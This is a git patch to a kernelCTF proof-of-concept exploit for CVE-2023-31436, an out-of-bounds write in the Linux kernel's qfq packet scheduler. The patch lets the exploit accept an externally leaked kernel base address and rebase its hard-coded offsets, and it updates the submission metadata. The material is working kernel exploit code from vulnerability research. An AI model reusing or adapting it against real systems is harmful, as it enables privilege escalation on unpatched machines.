From d87bad353a0350a76e7fbaa55921fa57fec0e3be Mon Sep 17 00:00:00 2001
From: liona24 <ackerm.lion@hotmail.de>
Date: Mon, 18 Sep 2023 10:08:46 +0200
Subject: [PATCH] Add option to use separate kaslr leak

---
 .../exploit/mitigation-6.1/exploit.c             | 16 ++++++++++++++--
 .../CVE-2023-31436_mitigation/metadata.json      | 12 ++++++------
 2 files changed, 20 insertions(+), 8 deletions(-)

diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c
index 74c925ed..88ce252f 100644
--- a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/exploit/mitigation-6.1/exploit.c
@@ -955,13 +955,25 @@ int bug_worker(void* arg) {
   }
 }
 
-int main() {
+int main(int argc, char* argv[]) {
   // main orchestration routine.
 
   // Hopefully less noise due to thread creation
   FAIL_IF(_pin_to_cpu(1) != 0);
 
-  FAIL_IF(get_kernel_base() < 0);
+  if (argc == 2) {
+    u64 base = strtoull(argv[1], NULL, 16);
+    L("using supplied kernel base: %llx", base);
+    u64 diff = base - 0xffffffff80000000ull;
+    L("diff: %llx", diff);
+
+    #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); }
+    FOR_ALL_OFFSETS(__x);
+    #undef __x
+  } else {
+    FAIL_IF(get_kernel_base() < 0);
+  }
+
 
   payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
   FAIL_IF(payload == MAP_FAILED);
diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
index 7018e6cb..25dfabd6 100644
--- a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
+++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json
@@ -1,5 +1,5 @@
 {
-    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json",
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
     "submission_ids": ["exp52"],
     "vulnerability": {
         "summary": "qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.",
@@ -14,11 +14,11 @@
             ]
         }
     },
-    "exploits": [
-        {
-            "environment": "mitigation-6.1",
+    "exploits": {
+        "mitigation-6.1": {
             "uses": ["userns"],
-            "stability_notes": "5% success rate"
+            "stability_notes": "5% success rate",
+            "requires_separate_kaslr_leak": true
         }
-    ]
+    }
 }